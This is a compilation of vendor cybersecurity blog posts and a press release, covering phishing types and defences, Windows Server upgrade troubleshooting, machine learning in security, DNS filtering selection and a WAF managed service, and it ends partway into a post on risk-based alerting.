The aim of a phishing scam is to steal your credentials, and it’s no wonder why—according to Verizon, 86% of data breaches in 2023 involved compromised credentials.  And AI is making the various phishing schemes easier than ever – from improving the quality of the e-mails themselves and removing the tell-tale grammatical errors to using fake voices in vishing scams, the effectiveness of these scams is only increasing.  

Below, we explore the different types of phishing and how they work, and then discuss how you can protect yourself from this ever-growing threat.

Classic Phishing Attacks

Classic phishing attacks typically involve deceitful emails designed to trick recipients into revealing personal information or clicking malicious links. These emails often mimic legitimate companies or organizations to gain the victim’s trust. Google intercepts around 100 million phishing emails daily, but that leaves quite a few still making it through. Telltale signs of a phishing e-mail are links that do not look right (perhaps a misspelled domain name like amazone.com or extra words like amazon.customersupport.com), some odd grammar choices, and a sense of urgency that seems out of place (“update info now or your account will be disabled!”)

SMShing (or Smishing)

“You won a $1,000 gift card!” “USPS cannot deliver your package, click here to update your address!” “Unusual activity detected on your bank account!”  Chances are, you’ve gotten a text message like that, which is an attempt at SMShing, or phishing via SMS.  Like e-mails, they often contain an unusual sense of urgency and some misplaced links, but the link shorteners commonly used in legitimate text messages make these harder to spot.  Always go directly to the company’s website to confirm any messages asking you to do anything (and any US government entity like the USPS or IRS) is not going to communicate with you solely via text.

If you’re in the US, did you know you can forward SMShing messages to the FTC?  Send to 7726 (AKA SPAM on your phone’s keypad) and it will help your wireless provider identify and block these messages in the future.  

Vishing

Vishing (short for “voice phishing”) is a type of phishing attack that uses voice communication, typically phone calls, to deceive victims into revealing sensitive information, such as login credentials, financial details, or personal data.   A very common one in the US purports to be from the IRS, threatening penalties and jail time due to back taxes.  This one has been around for a while – a viral video from 2018 shows a police officer in Midland, Texas talking to a scammer who tells him to clear his back taxes by buying Apple gift cards or the police would be en route to arrest him within 45 minutes.    

Spear Phishing

Spear phishing is a refined and highly targeted form of phishing that requires more effort and research from the attacker. Unlike general phishing, which casts a wide net hoping to snare any unsuspecting victim, spear phishing focuses on specific individuals or organizations. Attackers gather detailed information about their targets to create highly convincing messages that appear legitimate and relevant.

These attackers often utilize information from social media profiles, company websites, and other publicly available sources to customize their approach. The crafted messages may reference recent activities, personal interests, or professional responsibilities, making them difficult to distinguish from genuine communications. This personalization increases the chances of the victim being deceived.

For instance, an attacker targeting an executive might send an email that appears to be from a trusted colleague or business partner. The message might discuss a recent meeting or project, encouraging the recipient to click on a link or download an attachment. Once the victim takes the bait, they could unknowingly download malware or reveal sensitive information, potentially compromising the entire organization.

Spear phishing is not limited to email. Attackers may also use phone calls, social media messages, or even physical mail to carry out their schemes. Given the targeted nature of these attacks, they can have severe consequences, including data breaches, financial loss, and reputational damage.

Recognizing and defending against spear phishing requires a keen eye and a proactive approach. Employees should be trained to scrutinize unexpected communications, even if they seem to come from known contacts. Encourage staff to verify the legitimacy of suspicious messages by contacting the sender through a different, trusted method.

In addition to awareness training, employing technical defenses can help mitigate the risk of spear phishing. Advanced email filters, multi-factor authentication, and robust cybersecurity protocols add layers of protection. By combining vigilance with technological safeguards, individuals and organizations can better protect themselves against the sophisticated tactics of spear phishers.

Whaling

A whaling attack is a highly targeted phishing attack aimed at high-level executives, such as CEOs, CFOs, or other senior leaders within an organization. The goal is to deceive these individuals into sharing sensitive information, transferring funds, or granting access to confidential systems.  Unlike the first two methods, these attacks are often carefully crafted to appear legit, banking on busy executives who may get careless with doing their due diligence.  In addition to the usual compromised credentials, they might also target intellectual property or strategic competitive intelligence (but they’re not above wire fraud, either!)

Clone Phishing

Clone phishing is a type of phishing attack in which a legitimate email or message that the victim has previously received is copied (“cloned”) and slightly altered by an attacker. The goal is to trick the recipient into believing the new, fraudulent message is a genuine follow-up or update.  

This might not seem different than regular phishing, but the key is that it’s coming from a trusted source.  For instance, during the Okta breach, the targets were customers who had actually used Okta support recently.  Since they might be expecting a message from Okta, the recipients might have understandably not been as vigilant as normal in spotting any irregularities.  

Angler Phishing

Angler phishing is a type of social media phishing attack in which cybercriminals impersonate customer service accounts to deceive users into revealing sensitive information or downloading malware. The term “angler” comes from the way attackers “fish” for victims on social platforms.  When you consider that messaging company accounts on Facebook and/or Twitter has become an established way to get better support than going through traditional channels like phone or e-mail, this type of attack targets users who are already frustrated (and thus perhaps more likely to be careless.) 

Reducing Phishing Risks with Passwordless Login

Transitioning to passwordless certificate-based authentication is a promising strategy to counter phishing attacks. This method uses certificates for authentication, eliminating the need for passwords altogether. This means attackers cannot steal passwords through phishing, significantly reducing the risks of compromise.

In addition to a higher level of security, passwordless authentication simplifies the login process for users. Instead of remembering complex passwords, authentication is handled through the secure exchange of cryptographic keys, where a digital certificate issued by a trusted authority verifies the user’s identity. This enhances security and improves the user experience, making it more convenient and efficient.

Organizations adopting passwordless authentication can benefit from reduced helpdesk calls related to password resets and improved compliance with security policies. This transition also aligns with modern security standards and best practices, positioning organizations ahead of evolving cyber threats.

Embracing passwordless authentication can fortify your defenses against phishing and other cyberattacks, paving the way for a more secure and user-friendly digital environment.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.。

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Best Practices for Troubleshooting a Windows Server Upgrade

Best Practices for Troubleshooting a Windows Server Upgrade

To upgrade, or not to upgrade. While that may not have been the question that Hamlet asked, it’s one you might be asking. You already made the mistake of asking Reddit, “should I do an in-place upgrade,” and, as expected, people had Big Opinions. A Windows Server Feature Update offers benefits, like performance and analytics. On the other hand, if you have problems, then your attempts can lead to business downtime and service disruption. Meanwhile, time rolls on toward the October 2025 end-of-service (EoS) for Windows Server 2016.

 

If you’re still trying to decide if or when to do a Feature Update, then these best practices for troubleshooting a Windows Server upgrade might help you.

 

What is an in-place Windows Server upgrade?

An in-place Windows server upgrade, also called a Feature Update, is when an organization updates an older operating system version to a new one without making changes to:

  • Settings
  • Server roles
  • Data

 

By not requiring the IT department to reinstall Windows, the in-place upgrade reduces downtime and business disruption while improving security and system performance.

 

The process for an in-place Windows server upgrade is:

  • Collecting diagnostic information for troubleshooting issues
  • Backing up the server operating system applications, and virtual machines
  • Performing the Feature Update using the Windows Server Setup
  • Checking the in-place upgrade to see if it worked

 

Which version of Windows Server should I upgrade to?

 

Depending on your current operating system, you may have different supported paths:

  • Windows Server 2012: Windows Server 2012 R2, Windows Server 2016
  • Windows Server 2012 R2: Windows Server 2016, Windows Server 2019, Windows Server 2025
  • Windows Server 2016: Windows Server 2019, Windows Server 2022, Windows Server 2025
  • Windows Server 2019: Windows Server 2022, Windows Server 2025
  • Windows Server 2022: Windows Server 2025
  • Windows Server 2025: Windows Server 2025

 

Microsoft no longer supports Windows Server 2008 or Windows Server 2008 R2.

Reasons for Upgrading Windows Servers

Upgrading Windows Server provides many of the same benefits that updating other device operating systems (OS) provides.

1. Enhanced Security

As with any operating system, the Windows Server upgrades typically incorporate new security features. For example, Windows Server 2022 brought with it:

  • Secured-core server: hardware, firmware, and driver capabilities to mitigate security risks during boot, at the firmware level, and from OS executing unverified code
  • Secure connectivity: implementing HTTPS and TLS 1.3 by default, encryption across DNS and Server Message Block (SMB),

 

Meanwhile, Windows Server 2025 includes security upgrades for:

  • Name and Sid lookup forwarding between machine accounts
  • Confidential attributes
  • Default machine account passwords
  • LDAP encryption by default

 

2. Improved Performance

The OS updates improve performance by changing how processes work. For example, Windows Server 2022 improved performance with changes like:

  • Encrypting SMB data before data placement
  • Reducing Windows Container image sizes
  • Improving both UDP and TCP networking performance
  • Enhancing Hyper-V virtual switches with Receive Segment Coalescing (RSC)
  • Allowing users to adjust storage repair speed
  • Making storage bus cache available for standalone servers

 

Meanwhile, Windows Server 2025 improves performance with changes like:

  • Block cloning support
  • Dev Drive storage volume focused on file system optimizations that improve control over storage volume settings
  • Enhanced Log to reduce impact on Storage Replica log implementation

 

3. Enhanced Efficiency and Agility

As the world migrates to hybrid on-premises and cloud infrastructures, the upgrades to Windows Server follow along. For example, Windows Server 2022 came with new Azure hybrid capabilities with Azure Arc, a way to manage Windows and Linux physical servers and virtual machines hosted outside of Azure to maintain consistency. With Windows Server 2025, the Azure Arc setup Feature-on-Demand is installed by default so adding servers is easier.

 

Challenges with Windows Server Upgrades

While upgrading Windows Server comes with multiple benefits, you may be concerned about the potential problems and challenges, including:

  • Compatibility issues: Applications running on the server may not work with the new OS version, leading to outages.
  • Configuration restrictions: Server boot configurations may complicate the upgrade process, requiring reconfiguration or virtualization changes.
  • Disk space: Upgrades typically require extra space for installation files and temporary processing or else they fail.

 

How to Troubleshoot a Windows Server Upgrade

While you want everything to work perfectly, you don’t live in a perfect world. If you have to troubleshoot your Windows Server upgrade, then you might want to consider some of these issues.

Review event logs

Using the Event Viewer, you can scan the System and Application logs for Windows Events generated around the same time you did the upgrade. Some Windows Server error codes include:

  • 0x80244007: Windows cannot renew the cookies for the Windows Update
  • 0x80072EE2: WIndows Update Agent unable to connect to the update servers or your update source, like Windows Server Update Services (WSUS)
  • 0x8024401B: Proxy error leads to Windows Update Agent being unable to connect to update servers or your update source, like WSUS.
  • 0x800f0922: Updates for Windows Server 2016 failed to install.
  • 0x800706be: Windows Server 2016 cumulative update failed to install and was
  • 0x80090322: HTTP service principal name (SPN) registered to another service account so PowerShell unable to connect to a remote server using Windows Remote Management (WinRM)

 

Check for Pending Reboot

An upgrade typically requires four reboots. After the first reboot, you can expect another within 30 minutes. If you see no progress, the upgrade may have failed.

 

Review Servicing Stack Updates

The servicing stack updates (SSUs) fix problems with the component that installs the Windows Server updates to make sure they’re reliable. Without the latest SSU installed, you may not be able to install the feature or security updates.

 

Check CPU and I/O

Since the Windows Server upgrade uses a lot of compute power and disk space, you want to make sure that you check these metrics to make sure the process is progressing.

 

Check Firewall Service

You may need to have the Windows firewall service running for the updates to work. To check whether the service is running, go to Service Manager>Services>Windows Firewall.

 

Graylog Enterprise: Faster Troubleshooting

Graylog Enterprise enables you to aggregate, correlate, and analyze all your log data in a single location. With Graylog Extended Log Format (GELF) inputs and BEATS inputs, you have a standardized format across Windows log types

Graylog supports Winlogbeat to ingest Windows event logs directly into our BEATS input, or you can use the NXLog community edition that reads Windows event logs and forwards them in GELF.

Using Graylog Sidecar, you can implement multiple configurations per collector and centrally manage their configurations through the Graylog interface. Graylog Cloud accepts inputs from the Graylog Forwarder so that you can collect the same kind of logs from different parts of your infrastructure or maintain a more redundant setup.

About Graylog
At Graylog, our vision is a secure digital world where organizations of all sizes can effectively guard against cyber threats. We’re committed to turning this vision into reality by providing Threat Detection & Response that sets the standard for excellence. Our cloud-native architecture delivers SIEM, API Security, and Enterprise Log Management solutions that are not just efficient and effective—whether hosted by us, on-premises, or in your cloud—but also deliver a fantastic Analyst Experience at the lowest total cost of ownership. We aim to equip security analysts with the best tools for the job, empowering every organization to stand resilient in the ever-evolving cybersecurity landscape.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

The role of machine learning in cybersecurity

So, does that mean IT teams will become redundant soon, as AI-based security tools can do it all? Simply put, no. But for a more in-depth answer, we’ll need to first understand what machine learning in cybersecurity is and what this technology holds for businesses in the future.

What is machine learning?

Machine learning refers to the ability of algorithms to learn patterns from existing data and use this knowledge to predict outcomes on new, previously unknown data without explicitly being programmed. The more information you feed to the machine learning engine, the more data it can analyze and, consequently, become more accurate.

But what does it mean to say that a machine is learning from the existing data? While traditional programming performs simple and predictable tasks by strictly following detailed instructions, machine learning allows the computer to teach itself through experience. In other words, it mimics human behavior in how to solve problems.

However, the fact that machine learning can improve itself isn’t the only reason why it’s so easy to find its models in the online wilderness. The sheer amount of information that businesses in different industries currently have to manage has become too vast for humans to tackle alone. As a result, companies rely on machine learning to process that data and quickly generate actionable insights.

For instance, an ML technique called a decision tree solves classification dilemmas and uses certain conditions or rules in the decision-making process. This particular technique is widely used in fintech (for loan approval and credit scoring) and marketing.

Machine learning solutions are also helpful for businesses in harvesting, organizing, and analyzing large volumes of customer data. This can include purchasing history or individual customer’s typical behavior, such as online browsing habits. With such analyzed data, companies can then recommend relevant products tailored to their customers’ preferences. Think Netflix: With an ML-driven model, it examines its users’ histories on the platform to compile appropriate content recommendations for them to choose from. This increases the time users spend watching Netflix content and their overall satisfaction. Similarly, ML models pick up information relevant to the unique user on the Facebook feed and even moderate content on Instagram.

Machine learning can also boost a company’s cybersecurity by detecting and responding to threats faster than human analysts. This has led to the term “machine learning security,” which, while still a bit niche, describes how ML is used for security tasks like spotting malware or unusual network activity. With its ability to handle massive amounts of data, machine learning has become a key tool for keeping systems safe.

In addition, in most customer support self-service tools, users usually interact with a machine rather than a fellow human being. Such chatbots can answer basic questions and guide a person to relevant content on the website.

Lastly, even in the medical field, machine learning plays a huge role. These models can be trained to examine medical images or other information and then search for illness characteristics.

The importance of data quality in machine learning security

To get the most out of machine learning, you need to give it high-quality data. Think of it this way: ML can only analyze and learn from what you put into it, so if the data’s flawed, the insights will be too. This is especially critical for companies using ML to support decision making. Without quality data, ML models may lead to misguided decisions.

Alongside accuracy, machine learning security is also a vital part of data quality. Sensitive information should be prepared and protected before feeding it into ML models. Some ML platforms, while powerful, have vulnerabilities that could expose data if not managed carefully. In short, quality data should be both precise and secure.

Four types of machine learning

Machine learning traditionally has four broad subcategories that are defined by how the machine learns:

  • Supervised machine learning models rely heavily on “teachers”, meaning models that are trained with labeled data sets, which allow them to learn and become more accurate over time. For instance, if you want to teach the algorithm to identify cats, you’ll have to feed it with pictures of cats and other things, all labeled by humans.

  • Unsupervised machine learning looks for patterns and common elements in data. In turn, such machine learning can find similarities and trends that humans aren’t explicitly looking for.

  • Semi-supervised machine learning falls somewhere between supervised and unsupervised learning. In this case, the model is trained on a small amount of labeled data and lots of unlabeled data. Such a way of learning is beneficial when there’s a lot of unlabeled data, and it’s too difficult (or expensive) to label it all.

  • Reinforcement machine learning is where an algorithm learns new tasks by interacting with a dynamic environment. Here, it is rewarded for correct actions, which it strives to maximize, and punished for incorrect ones. Such machine learning is widely used in cybersecurity, as it enables a broader range of cyber attack detection.

 

Machine learning use cases in cybersecurity

As cybersecurity is a truly fast-paced environment where threats, technologies, and regulations constantly evolve, it’s the agility of machine learning that comes in handy.

ML-powered models can process massive amounts of data and, therefore, rapidly detect critical incidents. This means that machine learning enables organizations to detect various types of threats like malware, policy violations, or insider threats by constantly monitoring the network for anomalies. It is so because ML-driven algorithms learn to identify, for instance, new malicious files or activity based on the attributes and behaviors of previously detected malware.

In addition, using machine learning proves to be a good method for filtering your company’s inbox from unsolicited, unwanted, and virus-infected spam emails, which may contain pernicious attachments such as malware or ransomware. For instance, the machine learning model used by Gmail not only sifts through spam but also generates new rules based on what it has learned in the past. ML methods, coupled with natural language processing techniques, can also detect phishing domains by picking on phishing domain characteristics and features that distinguish legitimate domains.

Last but not least, machine learning can significantly support online fraud detection and prevention. By using ML algorithms, companies can identify suspicious activities in transactional data. These algorithms are trained to recognize normal payment processes and flag suspicious ones. Also, ML-driven engines can be trained to spot when cybercriminals change their tactics as they automatically will retrain themselves to recognize a new fraud pattern.

These examples illustrate just a few use cases of machine learning in cybersecurity. But there are many others, such as vulnerability management, that can greatly impact business cybersecurity.

So, is it AI, machine learning, or deep learning?

Frequently, these terms – artificial intelligence, machine learning, and deep learning (DP) – are used interchangeably. We already defined machine learning, so now, let’s see how it relates to artificial intelligence and deep learning.

Artificial intelligence, in the broadest sense, is a set of technologies that enable computers to perform various advanced tasks in a way similar to how humans solve problems. This makes machine learning a subfield of artificial intelligence.

In turn, deep learning is a subset of machine learning. It mimics the structure and functions of the human brain. Such systems use artificial neural networks that function like neurons in the brain. These neurons, also referred to as nodes, are used in chatbots or autonomous vehicles.

Difference between machine learning, artificial intelligence, deep learning, and cybersecurity

Even though machine learning brings some challenges when applied to cybersecurity (for instance, the difficulty in collecting large amounts of certain malware samples for the ML machine to learn from), it remains the most common approach and term used to describe AI applications in this industry.

In cases where shallow (or traditional machine learning) falls short, deep learning should be used. For example, when dealing with highly complex data such as images and unstructured text or when temporal dependencies have to be taken into account.

 

The future of machine learning in cybersecurity

In the current AI tool-filled climate, it’s easy to see how this technology can become better at specific tasks than we humans are. Luckily (or not), machine learning is not a panacea to all things cybersecurity. However, it provides and will continue to provide a great deal of support to cybersecurity or IT teams by reducing the load off of their shoulders.

Since many devices (like phones and laptops) connect to the company’s networks daily, it is almost impossible for IT teams to monitor every single gadget. With AI-powered device profiling, you can improve the fingerprinting of endpoint devices and better understand the type and quantity of endpoints connecting to your network. This will help you create effective segmentation rules and stop unwanted devices (potentially including bad actors) from connecting.

Also, employing machine learning can improve your cybersecurity game by helping your IT team develop policy recommendations for security devices such as firewalls. In this case, machine learning learns what devices are connected to the network and what constitutes normal device behavior. In turn, ML-powered systems can make specific suggestions automatically — instead of your team manually navigating different conflicting access control lists for each device and network segment.

And so, integrating artificial intelligence in security, particularly through machine learning, can significantly enhance how your cybersecurity framework adapts to the evolving IT landscape. With more devices and threats coming online daily, the human resources available to tackle them are becoming scarce. In such an environment, machine learning can step in by helping sort out various complicated cybersecurity situations and scenarios at scale while maintaining constant surveillance 24/7.

Challenges of Machine Learning in Cybersecurity

Just like in life, the things that bring us the most value come with their own set of challenges. After all, you can’t expect great results without putting in some effort. The same goes for using machine learning in cybersecurity. It can be incredibly powerful, but getting the most out of it requires navigating a few obstacles along the way. So, here are a few challenges you might face when applying ML to data security:

  • Adaptation to threats: Cyber threats are becoming increasingly intricate and complex, requiring ML models to undergo continuous retraining to identify new vulnerabilities effectively. This ongoing adaptation is essential to ensure that ML security systems remain capable of countering the latest tactics employed by hackers.

  • Adversarial attacks (ML poisoning): By manipulating input data or introducing deceptive data, attackers can compromise an ML model’s effectiveness, reducing system reliability and jeopardizing operations by making it more difficult to accurately identify malicious activity.

  • Operational issues: Integrating machine learning into an established cybersecurity framework isn’t always straightforward. There are a few challenges to consider, like the complexity of the implementation process, the risk of false positives that can add to analysts’ workloads, regulatory compliance requirements, and the limited availability of professionals skilled in both ML and cybersecurity.

How does NordPass use machine learning?

Machine learning offers a wide range of applications for businesses, from applying it to cybersecurity to simply enhancing customer satisfaction. With artificial intelligence still making headlines, we’re likely to see even more use cases in the future. However, machine learning in IT security will be one of the key areas that will continue to evolve.

NordPass is one of the companies that use machine learning. We do so to offer more accuracy and convenience for our customers. Our autofill engine relies heavily on machine learning to accurately categorize the field that it needs to fill in on a website or app – no matter if it is a sign-up, credit card, or personal information form. Remember those artificial neural networks? It has been trained using exactly those!

If you’re interested in improving your IT team‘s online experience and enhancing overall company security, explore what enterprise password management can offer for your company.

About NordPass
NordPass is developed by Nord Security, a company leading the global market of cybersecurity products.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

How to choose the best DNS filtering solution for your business

Summary: Discover key factors for selecting a DNS filtering solution that enhances network security, boosts productivity, and ensures compliance for your business.

Now, businesses face many online threats that can jeopardize network security, reduce employee productivity, and compromise regulatory compliance. Domain Name System (DNS) filtering is a powerful tool for protecting against these threats by blocking access to harmful websites—those that may host malware, phishing attempts, or inappropriate content.

Beyond protecting your network, DNS filtering tools improve workplace productivity by limiting access to non-work-related websites. They also help ensure compliance by restricting access to certain types of content.

However, with many DNS filtering providers available, selecting the right one can be overwhelming. This guide will walk you through the key factors to consider when choosing the best DNS filtering solution for your organization.

How DNS filtering solutions work

DNS filtering is like a gatekeeper for internet usage, preventing access to malicious or inappropriate websites before they can harm your network. By intercepting DNS queries—requests users make when accessing a website—the filtering system determines whether the requested domain is safe based on predefined security policies.

Typically, DNS servers function like an internet “phonebook,” translating domain names into IP addresses to connect your browser and the required website.

With a DNS filtering solution in place, however, each query undergoes additional checks. If the requested site is flagged on a blocklist or is identified as a security risk, the DNS resolver blocks the request, preventing the page from loading and neutralizing potential cyber threats.

Benefits of implementing a DNS filtering solution

Deploying a DNS filtering solution offers a range of benefits that go beyond basic Internet browsing controls:

Internet threat prevention

Each organization should control employee online traffic. By blocking access to sketchy sites full of malware, phishing, or ransomware, DNS filtering solutions shield your network from all kinds of cyber-attacks before they even have a chance to strike.

Keeping productivity on point

Let’s face it—distractions are everywhere. DNS filtering tools help minimize those distractions by blocking non-work-related sites so your team can stay focused and get more done.

Improved network performance

No more bandwidth hogs. A DNS filtering solution ensures your network runs smoothly and efficiently by limiting heavy streaming or large file downloads.

Security compliance

Worried about regulations? DNS filtering helps you meet industry standards by controlling access to restricted content and protecting your business from potential legal and reputational risks.

Keeping remote workers safe

With more people working remotely, DNS filtering solutions block online threats and secure sensitive data, no matter where your employees log in.

Filtering for safer Internet access

Whether it’s a school, home, or workplace, DNS filtering blocks inappropriate or harmful content, creating web filtering for schools or employees.

 

5 considerations for choosing the best DNS filtering solution

When it comes to selecting a DNS filtering provider, it’s essential to weigh your options carefully. With so many choices out there, understanding the key factors can help you find the right fit for your organization. Here are some critical considerations to keep in mind:

#1 Technical architecture

The backbone of a solid DNS filtering solution is its technical architecture. You’ve got two main options: cloud-based or on-premise. Cloud-based solutions are super scalable. They make it easier to grow with your business’s security needs. They are also easier to deploy, need less maintenance, and usually come with real-time updates.

On-premise solutions give you more control over your data. This can be a big help if you have strict privacy rules. However, they might require higher initial costs, more time, and greater expertise to maintain.

Another thing to keep in mind is DNS resolution speed—how fast it can process requests and load websites. A provider with a global network will keep things running smoothly with less lag when accessing sites.

#2 Advanced threat detection

In today’s world, you need more than just the basics. Look for a DNS filtering solution that’s equipped with advanced threat detection. Such a solution must monitor network activity in real-time, spotting and blocking threats like malware and phishing before they can mess with your network. As cyber threats keep evolving, having a tool that adapts is a must.

#3 Integration with existing systems

Whatever DNS filtering solution you pick should be compatible with your current system. Make sure it works well with your existing security infrastructure, like your firewall or Security Information and Event Management (SIEM) tools. Some providers even offer API access for easy integration with third-party tools or custom solutions. A smooth integration means less hassle for your IT team and a more seamless security experience.

#4 Granular policy management

DNS filtering is designed to restrict access to specific content, but when it comes to defining exclusive rules for network access, we enter a different technological area. Therefore, when selecting DNS filtering solutions, it’s best to look for comprehensive products beyond content restriction and address network access use cases.

Fine-tuning access with your DND filtering solution helps boost productivity and security, keeping everyone where they need to be.

#5 Real-time analytics and reporting

Keeping tabs on what’s happening in your network is essential. Make sure your DNS filtering provider offers real-time analytics and reporting so you can spot potential threats, check network activity, and stay compliant. Detailed DNS query logs and custom reports are especially useful for digging into incidents or proving you’re following industry regulations.

Tips for selecting the best DNS filtering solution

  • Check out content control features: Look for customizable filtering options that let you block malware, phishing attempts, adult content, gambling sites, and more. Keeping distractions and risks at bay is key for productivity and compliance.
  • Make sure it has solid security features: Don’t settle for basic protection. Your DNS filtering solution has strong encryption, advanced threat detection, and malware protection. These features add extra layers of security, especially when your data is in transit.
  • Go for user-friendly setup and centralized management: Setting up DNS filtering shouldn’t be a headache. Look for something simple to install with centralized management so your IT team can control everything from one spot, enforce policies, and quickly handle any issues.
  • Look for customization options: Every business is different, so you’ll want a solution that lets you fine-tune filtering rules to fit your specific needs. Flexibility is key to keeping security tight without slowing down business activities.

Conclusion

Choosing a DNS filtering solution for your business is critical. It impacts everything from your cybersecurity to productivity and compliance. Take the time to evaluate things like the technical architecture, how the provider handles threats, and how well the solution integrates with your current systems. Opt for providers that offer robust security, real-time reporting, and detailed control over access to make sure you’re getting the best DNS filtering solution possible.

With the right DNS filtering in place, you can protect your network, control online interactions, and create a safer, more productive work environment for your team.

How NordLayer can help

NordLayer offers easy-to-use DNS filtering capabilities to protect your network. With features like DNS filtering by category, Web Protection, and Download Protection, keeping your team safe is simple. Setup is quick, even for non-tech users, and managing security for your whole team is straightforward.

  • DNS filtering by category allows IT admins to block content from over 50 categories. This helps keep your network secure and your team focused.
  • Web Protection automatically blocks access to websites that are flagged as potentially malicious.
  • Download Protection scans every new file download and removes harmful files before they can infect your devices.

These features can work together to prevent risks like malware infections and phishing. But that’s not all. All NordLayer customers get encrypted connections and masked IP addresses. This ensures your internet access is secure, no matter where you are.

Want to learn more? Contact NordLayer’s sales team to see how we can help protect your network.

 

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Penta Security Launches a Cloud Security Provider WAF Managed Service on AWS Marketplace

 

Penta Security, a leading cyber security company and provider of web application security in the Asia-Pacific region, announced that Penta Security’s Cloudbric WMS has officially launched a usage-based SaaS subscription model on AWS Marketplace in December of 2024.

Cloudbric WMS (WAF Managed Service) is a managed service developed for Cloud Service Provider Web Application Firewalls (CSP WAF), such as AWS WAF.

While CSP WAFs are powerful security tools, as CSP WAFs typically require the users to configure the security rules themselves, it can be quite difficult to utilize the CSP WAFs to their full potential.

To address this issue, Penta Security has developed a managed service that optimizes the security rules and provides a dedicated console to monitor the security status for AWS WAF users. When Cloudbric WMS is adopted, the security experts of Penta Security initially analyze the user’s logs and optimize the rules for maximum efficiency fit to the unique environment of the user.

Once the initial security rule optimization process is completed, the user will be provided access to a dedicated console for monitoring and security rule configurations. Through Cloudbric WMS, the user can gain better insight and control of the security rules for their AWS WAF.

The security rules utilized by Cloudbric WMS is based on the security technologies and expertise of Penta Security’s own WAF, WAPPLES, which has protected the web services for enterprises since 2005 and has recently been validated by a third-party testing firm to have a top-tier detection rate. These security rules are also provided in AWS Marketplace in the form of managed rule groups, which are presets of security rules provided by Independent Software Vendors for AWS WAF.

Taejoon Jung, director of the Planning Division at Penta Security stated, “Cybersecurity is always a difficult subject and an area that requires a certain level of expertise. However, it is our vision to provide an easier solution for security. We expect Cloudbric WMS will boost their AWS WAF experiences simply by subscribing to the service.”

Cloudbric WMS for AWS WAF (PAYG) product is available for subscription in the AWS Marketplace. AWS Marketplace is a curated digital store where users can search, evaluate, purchase, distribute and manage solutions provided by AWS Partners.

About Penta Security
Penta Security takes a holistic approach to cover all the bases for information security. The company has worked and is constantly working to ensure the safety of its customers behind the scenes through the wide range of IT-security offerings. As a result, with its headquarters in Korea, the company has expanded globally as a market share leader in the Asia-Pacific region.

As one of the first to make headway into information security in Korea, Penta Security has developed a wide range of fundamental technologies. Linking science, engineering, and management together to expand our technological capacity, we then make our critical decisions from a technological standpoint.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Leveling Up Security Operations with Risk-Based Alerting

In life, you get a lot of different alerts. Your bank may send emails or texts about normal account activities, like privacy notices, product updates, or account statements. It also sends alerts when someone fraudulently makes a purchase with your credit card. You can ignore most of the normal messages, but you need to pay attention to the fraud alerts. Security is the same way. Since your systems can generate terabytes of data everyday, your security tools can fire high volumes of alerts, leaving you overwhelmed. 

With risk-based alerts, you can reduce alert fatigue by incorporating additional security information, giving you a way to focus on high-value issues.

What is risk-based monitoring in cybersecurity?

In cybersecurity, a risk-based approach to monitoring means that the organization assesses the business impact and likelihood of an attack against various:

  • People
  • Devices
  • Resources
  • Networks
  • Data

 

After identifying those people and assets who pose the highest risk, the security team often incorporates threat intelligence to help prioritize monitoring and remediation activities. For example, many security teams take a risk-based approach to vulnerability management by appling security updates to critical assets first. 

What is risk-based alerting?

